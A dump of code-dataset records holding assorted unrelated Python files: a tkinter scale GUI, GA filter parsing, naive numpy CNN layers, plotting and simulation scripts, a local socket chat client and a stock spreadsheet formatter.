stan_wagi.config(text=\"Taruje\")\n\ndef tare_change_text():\n stan_wagi.config(text=\"Taruje\")\n\ndef minus_send_btnClickFunction():\n print(window_title+':minus_send')\n print(new_mass.get())\n print(\"Rozpoczynam komunikacje z serwerem\")\n stan_wagi.config(text=\"Cofam\")\n #response = requests.get('10.186.10.2/test/insert_dla_wag.php'+ \"?data=-\"+new_mass)\n #sended_mass = 0\n #wiadomosc = response.content\n #print(wiadomosc)\n #if(wiadomosc == \"zapisalem\"):\n # return 1\n #else:\n # return 0\n\n#########################################END Funkcje przycisków\n\n# This is the section of code which creates the main window\nroot.geometry(\"+\"+str(lista_argumentow[3])+\"+\"+str(lista_argumentow[4]))\nroot.configure(background='#ecf0f1')\nroot.title(window_title)\nroot.resizable(False, False)\n\n# This is the section of code which creates the a label\nstan_wagi = Label(root, text='Stan wagi', font=('arial', 40, 'normal'),background='#3498db')\nstan_wagi.grid(row = 0,column = 0, columnspan=3, sticky=\"\")\n############################Funkcje obsługi seriala\n\n#serial_write(\"COM2\",\"text\")\n#return 1 on success\n#return 0 on fail\ndef serial_write(obj, string):\n if(obj.write(string.encode('utf-8'))):\n return 1 #on success\n else:\n return 0 #on fail\n \n#serial_read(\"COM2\")\n#return text on success\n#return 0 on fail.\n#def serial_read(chosen_port): #return 0 if no data was readed\n# recived_string = chosen_port.readline()\ndef serial_read_line(obj):\n wiadomosc = obj.readline()\n if(wiadomosc != \"b''\"):\n if(len(wiadomosc)!=0):\n print( wiadomosc)\n wiadomosc = wiadomosc.decode(\"utf-8\") \n wiadomosc = wiadomosc.replace('\\r','')\n wiadomosc = wiadomosc.replace('\\n','')\n print('Po odkodowaniu: \"'+ wiadomosc+'\"')\n return(wiadomosc)\n \ndef serial_clear_read_buffer(obj):\n obj.reset_input_buffer()\n\n############################END Funkcje obsługi seriala\n\n\n\n\n# This is the section of code which creates the a label\nvar = StringVar()\nvar.set(\"brak odczytu\")\nmasa = Label(root, text=var, font=('arial', 40, 'normal'),anchor='e',background='#2980b9',fg='#f1c40f')\nmasa.grid(row = 3,column = 0, columnspan=3, sticky=\"e\")\n\n# Przycisk wysylania --> Komunikuj z serwerem\nwyslij_buton = Button(root, text='Wyślij', bg='#bdc3c7', font=('arial', 22, 'normal'), command=send_btnClickFunction)\nwyslij_buton.grid(row=5,column=0)\n# Przycisk tarowania --> komunikuj do wagi tarowanie\ntaruj_buton = Button(root, text='Taruj', bg='#bdc3c7', font=('arial', 22, 'normal'), command=tare_btnClickFunction)\ntaruj_buton.grid(row=5,column=1)\n# Przycisk cofania --> Nadaj stary komunikat z minusem xD\ncofnij_buton =Button(root, text='Cofnij', bg='#bdc3c7', font=('arial', 22, 'normal'), command=minus_send_btnClickFunction)\ncofnij_buton.grid(row=5,column=2)\n\n\ntare_part.set(value=\"0\")\n\n\nupdate_mass()\ncheck_server_connection()\nroot.mainloop()\n","sub_path":"Wagi radwag folder ostateczny/0.2/gui0.1.9.py","file_name":"gui0.1.9.py","file_ext":"py","file_size_in_byte":9357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"623532313","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys,re, operator\n\ninFile = sys.argv[1]\nresults = [line.strip() for line in open(inFile,'r')]\ncount = 0\ndictje = dict()\n\n\nfor line in results:\n\tsplitter = line.split('\\t')[2].split(',')\n\talreadyOccured = []\n\tfor word in splitter:\n\t\tfixedWord = word.replace('#','').strip()\n\t\tif fixedWord not in alreadyOccured:\n\t\t\tif fixedWord in dictje:\n\t\t\t\tdictje[fixedWord] += 1\n\t\t\telse:\n\t\t\t\tdictje[fixedWord] = 1\t\n\t\t\talreadyOccured.append(fixedWord)\n\ncount = 0\n\nfor w in sorted(dictje, key=dictje.get, reverse=True):\n\tif count < 100:\n\t\tprint (w, dictje[w])\n\t\tcount += 1\t\t\t\n","sub_path":"calculateKeywordIDF.py","file_name":"calculateKeywordIDF.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"266618959","text":"weekdays = [\n 'Monday','Tuesday',\n 'Wednesday','Thursday','Friday'\n]\n\nfor idx, value in enumerate(weekdays):\n print(idx, value)\n\nfor value in reversed(weekdays):\n print(value)\n\n\nfruit = ['Apple', 'Orange', 'Banana', 'Watermelon']\ncolor = ['red', 'orange', 'yellow', 'green', 'blue']\n\nfor f, c in zip(fruit, color):\n print('The {0} is {1}'.format(f, c))\n","sub_path":"Optum Tech/student_files 2/ch01_overview/06_iterating.py","file_name":"06_iterating.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"561764824","text":"import matplotlib.pyplot as plt#导入matplotlib.pyplot并命名为plt\r\nimport numpy as np#导入nunpy并命名为np\r\nx=np.linspace(0,3*np.pi,100)#在0到3π之间取100个点作为x轴坐标\r\ny=np.sin(x)#y轴为一sin函数\r\n\r\nplt.rcParams['font.sans-serif']=['SimHei']#图表能够显示中文\r\nplt.rcParams['axes.unicode_minus']=False #能显示正负号\r\n\r\nplt.subplot(121)#在第一行第一列输出第一幅图像\r\nplt.title(r'$f(x)=sin(x)$')#输出图像标题f(x)=sin(x)\r\nplt.plot(x,y)#通过x,y描点画图\r\nx1=[t*0.375*np.pi for t in x]#循环把x中每一个元素进行t*0.375*np.pi运算,生成一串新的x轴坐标\r\ny1=np.sin(x1)#y轴为一sin函数\r\nplt.subplot(122)#在第一行第二列输出第二幅图像\r\nplt.title(r'$f(x)=sin(\\omega x),\\omega=\\frac{3}{8} \\pi$')#输出图像标题f(x)=sin(wx),w=3π/8\r\nplt.plot(x,y1)#通过x,y1描点画图\r\nplt.show()#在屏幕输出图像","sub_path":".vscode/20210519/20210519.py","file_name":"20210519.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"390550087","text":"from mara_google_analytics_downloader.static import METRICS, DIMENSIONS\n\n\ndef ga_parse_filter(report_request: dict, filters: str):\n \"\"\"\n This function is parsing the URL filter syntax (v3)\n https://developers.google.com/analytics/devguides/reporting/core/v3/reference#filters\n to the JSON format filter syntax (v4)\n https://developers.google.com/analytics/devguides/reporting/core/v4/basics#filtering\n https://developers.google.com/analytics/devguides/reporting/core/v4/basics#filtering_2\n and adds the filter ot the report request.\n\n Args:\n report_request: the dict with the report request\n filter: the filter string\n \"\"\"\n metric_filter_clauses = []\n dimension_filter_clauses = []\n\n # Reference: https://developers.google.com/analytics/devguides/reporting/core/v3/reference#filters\n if filters.find('(') >= 0 or filters.find(')') >= 0:\n raise Exception('Breakets in paramter --filters are not yet supported')\n\n\n for or_filter in filters.split(','):\n for and_filter in or_filter.split(';'):\n filter = and_filter\n\n # parse one filter (metric/dimension operator expression)\n metric_name = None\n dimension_name = None\n operator = None\n operator_not = False\n field_left = None\n field_right = None\n if filter.find('==') >= 0:\n field_left = filter[:filter.find('==')]\n field_right = filter[filter.find('==')+2:]\n operator = 'EXACT'\n elif filter.find('!=') > 0:\n field_left = filter[:filter.find('!=')]\n field_right = filter[filter.find('!=')+2:]\n operator = 'EXACT'\n operator_not = True\n elif filter.find('>') >= 0:\n field_left = filter[:filter.find('>')]\n field_right = filter[filter.find('>')+1:]\n operator = 'GREATER_THAN'\n elif filter.find('<') >= 0:\n field_left = filter[:filter.find('<')]\n field_right = filter[filter.find('<')+1:]\n operator = 'LESS_THAN'\n elif filter.find('>=') >= 0:\n field_left = filter[:filter.find('>=')]\n field_right = filter[filter.find('>=')+2:]\n operator = 'LESS_THAN'\n operator_not = True\n elif filter.find('<=') >= 0:\n field_left = filter[:filter.find('<=')]\n field_right = filter[filter.find('<=')+2:]\n operator = 'GREATER_THAN'\n operator_not = True\n elif filter.find('=@') >= 0:\n field_left = filter[:filter.find('=@')]\n field_right = filter[filter.find('=@')+2:]\n operator = 'PARTIAL'\n elif filter.find('!@') >= 0:\n field_left = filter[:filter.find('!@')]\n field_right = filter[filter.find('!@')+2:]\n operator = 'PARTIAL'\n operator_not = True\n elif filter.find('=~') >= 0:\n field_left = filter[:filter.find('=~')]\n field_right = filter[filter.find('=~')+2:]\n operator = 'REGEXP'\n elif filter.find('!~') >= 0:\n field_left = filter[:filter.find('!~')]\n field_right = filter[filter.find('!~')+2:]\n operator = 'REGEXP'\n operator_not = True\n else:\n raise Exception(f'Filter contains no or unknown operator: {filter}')\n\n if field_left in METRICS:\n # Reference: https://developers.google.com/analytics/devguides/reporting/core/v4/basics#filtering\n metric_filter_clauses.append({\n 'filters': [\n {\n 'metricName': field_left,\n 'not': operator_not,\n 'operator': operator,\n 'comparisonValue': field_right\n }\n ]\n })\n elif field_left in DIMENSIONS:\n # Reference: https://developers.google.com/analytics/devguides/reporting/core/v4/basics#filtering_2\n dimension_filter_clauses.append({\n 'filters': [\n {\n 'dimensionName': field_left,\n 'not': operator_not,\n 'operator': operator,\n 'expressions': [field_right]\n }\n ]\n })\n else:\n raise Exception(f'Unknown dimension/metric: {field_left}')\n\n if metric_filter_clauses:\n report_request.update({\n 'metricFilterClauses': metric_filter_clauses\n })\n if dimension_filter_clauses:\n report_request.update({\n 'dimensionFilterClauses': dimension_filter_clauses\n })\n","sub_path":"mara_google_analytics_downloader/filter_parsing.py","file_name":"filter_parsing.py","file_ext":"py","file_size_in_byte":5024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"338576893","text":"from keras.callbacks import Callback\n\n\nclass ValidationCallback(Callback):\n\n def __init__(self):\n super(ValidationCallback, self).__init__()\n self.epoch_targets = {}\n self.epoch_outputs = {}\n\n def on_epoch_end(self, epoch, logs={}):\n self.epoch_targets[epoch] = self.validation_data[1].argmax(axis=-1)\n self.epoch_outputs[epoch] = self.model.predict_classes(self.validation_data[0], verbose=0)\n return\n\n","sub_path":"SentimentAnalysis/network/validation_callback.py","file_name":"validation_callback.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"52233922","text":"import numpy as np\n\ndef relu_backward(dout, cache):\n \"\"\"\n Computes the backard pass for ReLU\n Input:\n - dout: Upstream derivatives, of any shape\n - cache: Previous input (used on forward propagation)\n\n Returns:\n - dx: Gradient with respect to x\n \"\"\"\n\n # Inititalize dx with None and x with cache\n dx, x = None, cache\n\n # Make all positive elements in x equal to dout while all the other elements\n # Become zero\n dx = dout * (x >= 0)\n\n # Return dx (gradient with respect to x)\n return dx\n\ndef relu_forward(x):\n \"\"\"\n Computes the forward pass for ReLU\n Input:\n - x: Inputs, of any shape\n\n Returns a tuple of: (out, cache)\n The shape on the output is the same as the input\n \"\"\"\n out = None\n\n # Create a function that receive x and return x if x is bigger\n # than zero, or zero if x is negative\n relu = lambda x: x * (x > 0).astype(float)\n out = relu(x)\n\n # Cache input and return outputs\n cache = x\n return out, cache\n\ndef fc_forward(x,w,b):\n \"\"\"\n Computes the forward pass for an affine (fully-connected) layer.\n\n Inputs:\n - x: Input Tensor (N, d_1, ..., d_k)\n - w: Weights (D, M)\n - b: Bias (M,)\n\n N: Mini-batch size\n M: Number of outputs of fully connected layer\n D: Input dimension\n d_1, ..., d_k: Single input dimension\n\n Returns a tuple of:\n - out: output, of shape (N, M)\n - cache: (x, w, b)\n \"\"\"\n out = None\n\n # Get batch size (first dimension)\n N = x.shape[0]\n\n # Reshape activations to [Nx(d_1, ..., d_k)], which will be a 2d matrix\n # [NxD]\n reshaped_input = x.reshape(N, -1)\n\n # Calculate output\n out = np.dot(reshaped_input,w) + b.T\n\n # Save inputs for backward propagation\n cache = (x,w,b)\n\n # Return outputs\n return out, cache\n\ndef fc_backward(dout, cache):\n \"\"\"\n Computes the backward pass for an affine (fully-connected) layer.\n\n Inputs:\n - dout: Layer partial derivative wrt loss of shape (N, M) (Same as output)\n - cache: (x,w,b) inputs from previous forward computation\n\n N: Mini-batch size\n M: Number of outputs of fully connected layer\n D: Input dimension\n d_1, ..., d_k: Single input dimension\n\n Returns a tuple of:\n - dx: Gradient with respect to x, of shape (N, d1, ..., d_k)\n - dw: Gradient with respect to w, of shape (D, M)\n - db: Gradient with respect to b, of shape (M,)\n \"\"\"\n x, w, b = cache\n dx, dw, db = None, None, None\n\n # Get batch size (first dimension)\n N = x.shape[0]\n\n # Get dX (Same format as x)\n dx = np.dot(dout,w.T)\n dx = dx.reshape(x.shape)\n\n # Get dW (Same format as w)\n # Reshape activations to [Nx(d_1, ..., d_k)], which will be a 2d matrix\n # [NxD]\n reshaped_input = x.reshape(N, -1)\n # Transpose then dot product with dout\n dw = reshaped_input.T.dot(dout)\n\n # Get dB (Same format as b)\n db = np.sum(dout, axis=0)\n\n # Return outputs\n return dx, dw, db\n\ndef conv_forward_naive(x, w, b, conv_param):\n \"\"\"\n Computes the forward pass for the Convolution layer. (Naive)\n Input:\n - x: Input data of shape (N, C, H, W)\n - w: Filter weights of shape (F, C, HH, WW)\n - b: Biases, of shape (F,)\n - conv_param: A dictionary with the following keys:\n - 'stride': How much pixels the sliding window will travel\n - 'pad': The number of pixels that will be used to zero-pad the input.\n\n N: Mini-batch size\n C: Input depth (ie 3 for RGB images)\n H/W: Image height/width\n F: Number of filters on convolution layer (Will be the output depth)\n HH/WW: Kernel Height/Width\n\n Returns a tuple of:\n - out: Output data, of shape (N, F, H', W') where H' and W' are given by\n H' = 1 + (H + 2 * pad - HH) / stride\n W' = 1 + (W + 2 * pad - WW) / stride\n - cache: (x, w, b, conv_param)\n \"\"\"\n out = None\n N, C, H, W = x.shape\n F, C, HH, WW = w.shape\n\n # Get parameters\n P = conv_param[\"pad\"]\n S = conv_param[\"stride\"]\n\n # Calculate output size, and initialize output volume\n H_R = 1 + (H + 2 * P - HH) / S\n W_R = 1 + (W + 2 * P - WW) / S\n out = np.zeros((N,F,H_R,W_R))\n\n # Pad images with zeros on the border (Used to keep spatial information)\n x_pad = np.lib.pad(x,((0,0),(0,0), (P,P), (P,P)), 'constant', constant_values=0)\n\n # Apply the convolution\n for n in xrange(N): # For each element on batch\n for depth in xrange(F): # For each filter\n for r in xrange(0,H,S): # Slide vertically taking stride into account\n for c in xrange(0,W,S): # Slide horizontally taking stride into account\n out[n,depth,r/S,c/S] = np.sum(x_pad[n,:,r:r+HH,c:c+WW] * w[depth,:,:,:]) + b[depth]\n\n # Cache parameters and inputs for backpropagation and return output volume\n cache = (x, w, b, conv_param)\n return out, cache\n\ndef conv_backward_naive(dout, cache):\n \"\"\"\n Computes the backward pass for the Convolution layer. (Naive)\n Inputs:\n - dout: Upstream derivatives.\n - cache: A tuple of (x, w, b, conv_param) as in conv_forward_naive\n Returns a tuple of: (dw,dx,db) gradients\n \"\"\"\n dx, dw, db = None, None, None\n x, w, b, conv_param = cache\n N, F, H_R, W_R = dout.shape\n N, C, H, W = x.shape\n F, C, HH, WW = w.shape\n P = conv_param[\"pad\"]\n S = conv_param[\"stride\"]\n # Do zero padding on x_pad\n x_pad = np.lib.pad(x,((0,0),(0,0), (P,P), (P,P)), 'constant', constant_values=0)\n\n # Inititalize outputs\n dx = np.zeros(x_pad.shape)\n dw = np.zeros(w.shape)\n db = np.zeros(b.shape)\n\n # Calculate dx, with 2 extra col/row that will be deleted\n for n in xrange(N): # For each element on batch\n for depth in xrange(F): # For each filter\n for r in xrange(0,H,S): # Slide vertically taking stride into account\n for c in xrange(0,W,S): # Slide horizontally taking stride into account\n dx[n,:,r:r+HH,c:c+WW] += dout[n,depth,r/S,c/S] * w[depth,:,:,:]\n\n #deleting padded rows to match real dx\n delete_rows = range(P) + range(H+P,H+2*P,1)\n delete_columns = range(P) + range(W+P,W+2*P,1)\n dx = np.delete(dx, delete_rows, axis=2) #height\n dx = np.delete(dx, delete_columns, axis=3) #width\n\n # Calculate dw\n for n in xrange(N): # For each element on batch\n for depth in xrange(F): # For each filter\n for r in xrange(H_R): # Slide vertically taking stride into account\n for c in xrange(W_R): # Slide horizontally taking stride into account\n dw[depth,:,:,:] += dout[n,depth,r,c] * x_pad[n,:,r*S:r*S+HH,c*S:c*S+WW]\n\n # Calculate db, 1 scalar bias per filter, so it's just a matter of summing\n # all elements of dout per filter\n for depth in range(F):\n db[depth] = np.sum(dout[:, depth, :, :])\n\n return dx, dw, db\n\ndef max_pool_forward_naive(x, pool_param):\n \"\"\"\n Compute the forward propagation of max pooling (naive way)\n Inputs:\n - x: 4d Input tensor , of shape (N, C, H, W)\n - pool_param: dictionary with the following keys:\n - 'pool_heigh/widtht': Sliding window height/width\n - 'stride': Sliding moving distance\n N: Mini-batch size\n C: Input depth (ie 3 for RGB images)\n H/W: Image height/width\n HH/WW: Kernel Height/Width\n\n Returns a tuple of: (out, cache)\n \"\"\"\n # Get input tensor and parameter data\n N, C, H, W = x.shape\n S = pool_param[\"stride\"]\n # Consider H_P and W_P as the sliding window height and width\n H_P = pool_param[\"pool_height\"]\n W_P = pool_param[\"pool_width\"]\n\n # Calculate output size\n out = None\n HH = 1 + (H - H_P) / S\n WW = 1 + (W - W_P) / S\n out = np.zeros((N,C,HH,WW))\n\n # Calculate output (Both for loops do the same thing ....)\n #for n in xrange(N): # For each element on batch\n #for depth in xrange(C): # For each input depth\n #for r in xrange(HH): # Slide vertically\n #for c in xrange(WW): # Slide horizontally\n # Get biggest element on the window\n #out[n,depth,r,c] = np.max(x[n,depth,r*S:r*S+H_P,c*S:c*S+W_P])\n\n # Calculate output\n for n in xrange(N): # For each element on batch\n for depth in xrange(C): # For each input depth\n for r in xrange(0,H,S): # Slide vertically taking stride into account\n for c in xrange(0,W,S): # Slide horizontally taking stride into account\n # Get biggest element on the window\n out[n,depth,r/S,c/S] = np.max(x[n,depth,r:r+H_P,c:c+W_P])\n\n # Return output and save inputs and paramters to cache\n cache = (x, pool_param)\n return out, cache\n\ndef max_pool_backward_naive(dout, cache):\n \"\"\"\n Compute the backward propagation of max pooling (naive way)\n Inputs:\n - dout: Upstream derivatives, same size as cached x\n - cache: A tuple of (x, pool_param) as in the forward pass.\n Returns:\n - dx: Gradient with respect to x\n \"\"\"\n # Get data back from cache\n x, pool_param = cache\n\n # Get input tensor and parameter\n N, C, H, W = x.shape\n S = pool_param[\"stride\"]\n H_P = pool_param[\"pool_height\"]\n W_P = pool_param[\"pool_width\"]\n N,C,HH,WW = dout.shape\n\n # Inititalize dx\n dx = None\n dx = np.zeros(x.shape)\n\n # Calculate dx (mask * dout)\n for n in xrange(N): # For each element on batch\n for depth in xrange(C): # For each input depth\n for r in xrange(HH): # Slide vertically (use stride on the fly)\n for c in xrange(WW): # Slide horizontally (use stride on the fly)\n # Get window and calculate the mask\n x_pool = x[n,depth,r*S:r*S+H_P,c*S:c*S+W_P]\n mask = (x_pool == np.max(x_pool))\n # Calculate mask*dout\n dx[n,depth,r*S:r*S+H_P,c*S:c*S+W_P] = mask*dout[n,depth,r,c]\n\n # Return dx\n return dx\n","sub_path":"python_reference_code/book_ai/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":9370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"597702569","text":"from game import *\nimport csv\nfrom nlattice import normalize\nfrom os import listdir\nfrom aggregate import agg, get_last_row\n\nresult_dir = '../../Results/b3/'\nstudy_name = 'b3'\n\ndim = 75\ndepth = 3\nmax_age = 2 * 10 ** 7\ncutoff_frac = 0.1\ngeom = \"torus\"\nmax_death = 2 #specific to game / parameter regime, most things we expect to coexist\ncutoff = cutoff_frac * dim ** depth\n\n\nwith open(result_dir + study_name +'-settings.txt', 'w') as summary_file:\n\tsummary_file.write(\"\"\"\n\t\tdim: %d\n\t\tdepth: %d \n\t\tmax_age: %.3g\n\t\tcutoff: %f\n\t\tgeom: %s\n\t\tpayoff: [[0,c/2,k-n],[1/2-c, 0, 1/2 + k - c], [n - k, c/2 - k, 0]]\n\t\t\"\"\" % (dim, depth, max_age, cutoff_frac, geom))\n\n\n#format : n, c, k\nparam_file = open(result_dir + study_name + '-params.csv', 'rU')\nreader = csv.reader(param_file)\nparams = [row for row in reader][1:] #read from this csv\n\nparams = map(lambda row: map(float, row), params) #convert strings to floats\n\nresult_files = [f for f in listdir(result_dir) if f[-9:] == 'stats.csv']\nresult_indices = \\\nmap(\n\tlambda f: int(f[f.find('_') + 1 : f.find('-')]),\n\t result_files)\n\n\n\n\nfor i,param in enumerate(params):\n\tif i in result_indices:\n\t\tcontinue\n\n\t[n, c, k] = param\n\n\t#ask to skip, and if so, what last row to fill in with\n\tstat_fname = result_dir + study_name + '_' + str(i) + '-stats.csv'\n\t#ask to skip, and if so, what last row to fill in with\n\t# pause = raw_input(\"skip n = %.2f, c = %.2f, k = %.2f ? (prev index is %d) \" \n\t# \t% (n,c,k, i - 1))\n\t# if pause != \"n\":\n\t# \twith open(result_dir + study_name + '-skips.csv', 'a') as skipfile:\n\t# \t\tskipfile.write(\",\".join([str(i), pause]) + '\\n')\n\n\t\t\n\t# \tprev_fname = result_dir + study_name + '_' + pause + '-stats.csv'\n\t# \tprev_row = \",\".join(get_last_row(prev_fname)) + '\\n'\n\t# \twith open(stat_fname, 'w') as stat_file:\n\t# \t\tstat_file.write(prev_row)\n\t# \tcontinue\n\tpayoff = [[0,c/2,k-n],[1/2-c, 0, 1/2 + k - c], [n - k, c/2 - k, 0]]\n\tprint(\"setting up board %d (n, c, k) = (%.2f, %.2f, %.2f)...\" % (i, n, c, k))\n\tg = Game(\n\t\tpayoff,\n\t\tdepth,\n\t\tdim,\n\t\tmaxGen = max_age,\n\t\tname = result_dir + study_name + '_' + str(i),\n\t\tgeom = \"torus\")\n\tprint(\"running sim ...\")\n\n\twhile not g.isFinished():\n\t\tif g.age % 5e5 == 0:\n\t\t\tprint(\"gen: %d\" % g.age)\n\t\t\tif len(filter(lambda x: x < cutoff, g.count)) == max_death: #two things close to dying\n\t\t\t\tg.end()\n\t\t\t\tbreak\n\t\tg.update()\n\n\tprint(\"finished at: \" + \",\".join(get_last_row(stat_fname)))\nagg(result_dir, study_name)\n\n\n\n\n\n","sub_path":"Code/simulation/b3_scan.py","file_name":"b3_scan.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"593061745","text":"from socket import *\nfrom _thread import *\nfrom tkinter import *\n\n\ns = socket((AF_INET) , SOCK_STREAM)\n\n\nhost = \"127.0.0.1\"\nport = 8000\ns.connect((host , port))\n\n\nroot = Tk();\nroot.title(\"Client\")\nroot.geometry(\"400x200\")\n\nL1 = Label(root)\nL1.grid(row =3 , column=3)\n\nentry = Entry(root , width=\"40\")\nentry.grid(row =1 , column =3)\n\n\ndef Clicked():\n\tmessage = entry.get()\n\ts.send(message.encode('utf-8'))\n\tentry.delete(0 , END)\n\nbtn = Button(root , text = \"Send\" , bg =\"Red\" , fg = \"black\" , width =8 , height =1 , command=Clicked)\nbtn.grid(row=1 , column=4)\n\n\ndef recvThread(s):\n\twhile True:\n\t\tL1[\"text\"] = s.recv(1204).decode('utf-8')\n\nstart_new_thread(recvThread , (s,))\n\nroot.mainloop();","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"505419933","text":"\"\"\"\nfunctions to prepare data about a puzzle given from the animation for the ai training.\n\"\"\"\ndef state_for_ai(vpy_vectors):\n \"\"\"\n convert the current state of the puzzle into it's representation for the ai\n the colors are taken from the vpython objects\n\n inputs:\n -------\n vpy_vectors - (list) of vpython vectors - a list of vpython vectors representing colors in the puzzle\n\n returns:\n --------\n (list) of ints - state of the puzzle as list of color indices\n (list) - list of colors occuring in the puzzle\n index in the list is the same as it's representation in the ai state\n \"\"\"\n color_list = []\n ai_state = []\n for vec in vpy_vectors:\n if not vec in color_list:\n color_list.append(vec)\n color_index = len(color_list)-1\n else:\n color_index = 0\n while color_list[color_index] != vec:\n color_index += 1\n ai_state.append(color_index)\n \n return ai_state, color_list\n","sub_path":"project/twisty_puzzle_analysis/gui/ai_modules/ai_data_preparation.py","file_name":"ai_data_preparation.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"454610850","text":"from backpack.extensions.firstorder.base import FirstOrderModuleExtension\n\n\nclass SGSBase(FirstOrderModuleExtension):\n def __init__(self, derivatives, params=None):\n self.derivatives = derivatives\n self.N_axis = 0\n super().__init__(params=params)\n\n def bias(self, ext, module, g_inp, g_out, bpQuantities):\n grad_batch = self.derivatives.bias_jac_t_mat_prod(\n module, g_inp, g_out, g_out[0], sum_batch=False\n )\n return (grad_batch ** 2).sum(self.N_axis)\n\n def weight(self, ext, module, g_inp, g_out, bpQuantities):\n grad_batch = self.derivatives.weight_jac_t_mat_prod(\n module, g_inp, g_out, g_out[0], sum_batch=False\n )\n return (grad_batch ** 2).sum(self.N_axis)\n","sub_path":"backpack/extensions/firstorder/sum_grad_squared/sgs_base.py","file_name":"sgs_base.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"374536549","text":"from datetime import datetime\nimport sys\nimport os \nimport time\nimport openpyxl\n#import xlrd\n\nNULL_VALUE = \"null\"\ninsertCnt = 0 \nisFirstLine = True\ntry:\n\tprint(\"[FormatFile.py] 開始執行時間:\" + time.strftime('%Y-%m-%d %H:%M:%S',time.localtime()))\n\n\tif len(sys.argv) < 2 :\n\t\tprint(\"You need input one parameter(fmt : 股票代號)\")\n\t\tprint(\"syntax : C:\\python FormatStocksSaleMonData.py 1326\")\n\t\tsys.exit()\n\n\tloadFileDir = \"csv\\\\goodinfo\\\\saleMonth\\\\\"\n\tsaveFileDir = \"txt\\\\goodinfo\\\\saleMonth\\\\\"\n\tinputFile = sys.argv[1] + \".xlsx\"\n\toutputFile = sys.argv[1] + \".txt\"\n\tstockNo = sys.argv[1]\n\t\n\toutfile = open(saveFileDir + outputFile, 'w')\n\n\twb = openpyxl.load_workbook('csv\\\\goodinfo\\\\saleMonth\\\\' + inputFile)\n\tsheet = wb[stockNo]\n\n\tisSTOP = False\n\tirow = 5\n\ticol = 1\n\n#\ttheList.append(\"insert into stocks_sale_month (stock_no,date,open_price_mon,end_price_mon,hgh_price_mon,low_price_mon,ups_downs,ups_downs_p,mon_revenue,mon_increase_in_revenue,ann_ins_revenue,cum_revenue,ann_ins_cum_revenue_p,csd_revenue,mon_ins_csd_revenue_p,ann_ins_csd_revenue_p,cum_csd_revenue,ann_ins_cum_csd_revenue_p) values ('\" + stockNo + \"'\")\n#\ttheSQLCmd = \"insert into stocks_sale_month (stock_no, date, open_price_mon, end_price_mon, hgh_price_mon, low_price_mon, ups_downs, ups_downs_p, mon_revenue, mon_increase_in_revenue, ann_ins_revenue, cum_revenue, ann_ins_cum_revenue_p, csd_revenue, mon_ins_csd_revenue_p, ann_ins_csd_revenue_p, cum_csd_revenue, ann_ins_cum_csd_revenue_p) values ('%s', '%d', '%f', '%f', '%f', '%f', '%f', '%f', '%f', '%f', '%f', '%f', '%f', '%f', '%f', '%f', '%f', '%f')\"\n#\toutfile.write(theSQLCmd+\"\\n\")\n\twhile not isSTOP :\n\t\ttheList = []\n\t\ttheList.append(\"insert into stocks_sale_month (stock_no,date,open_price_mon,end_price_mon,hgh_price_mon,low_price_mon,ups_downs,ups_downs_p,mon_revenue,mon_increase_in_revenue,ann_ins_revenue,cum_revenue,ann_ins_cum_revenue_p,csd_revenue,mon_ins_csd_revenue_p,ann_ins_csd_revenue_p,cum_csd_revenue,ann_ins_cum_csd_revenue_p) values ('\" + stockNo + \"'\")\n\n\t\tfor icol in range(1, 18) :\n\t\t\ttheValue = sheet.cell(row = irow, column = icol).value\n#\t\t\tprint(theValue)\n#\t\t\tif sheet.cell(row = irow, column = icol).value == None :\n\t\t\tif icol == 1 and sheet.cell(row = irow, column = icol).value == None :\n\t\t\t\t\tisSTOP = True\n\t\t\t\t\ttheList.pop()\n\t\t\t\t\tbreak\n\t\t\telif type(theValue) == str :\n\t\t\t\tif theValue == \"-\" :\n\t\t\t\t\ttheValue = NULL_VALUE\n\t\t\t\ttheList.append(theValue)\n\t\t\telif type(theValue) == int :\n\t\t\t\ttheList.append(theValue)\n\t\t\telif type(theValue) == float :\n\t\t\t\ttheList.append(theValue)\n\t\t\telif type(theValue) == datetime :\n\t\t\t\ttheList.append(str(theValue.strftime(\"%Y%m%d\")))\n\t\t\telse :\n\t\t\t\ttheList.append(theValue)\n\t\tprint(theList)\n\t\tif len(theList) > 0 :\n\t\t\toutfile.write(\", \".join([str(_) for _ in theList]))\n\t\t\toutfile.write(\");\\n\")\n\t\tinsertCnt += 1\n\n\t\t# 預防錯誤,理論上應該不會超過100列\n\t\tif irow > 100 :\n\t\t\tprint(\"i=\" + str(irow))\n\t\t\tisSTOP = True\n\t\tirow += 1\n\n\toutfile.close()\n\t\nexcept IOError as err :\n\tprint('File error : ' + str(err))\n\nprint(\"資料處理完成!! 共 \" + str(insertCnt) + \" 筆。\")\nprint(\"[FormatFile.py] 結束執行時間:\" + time.strftime('%Y-%m-%d 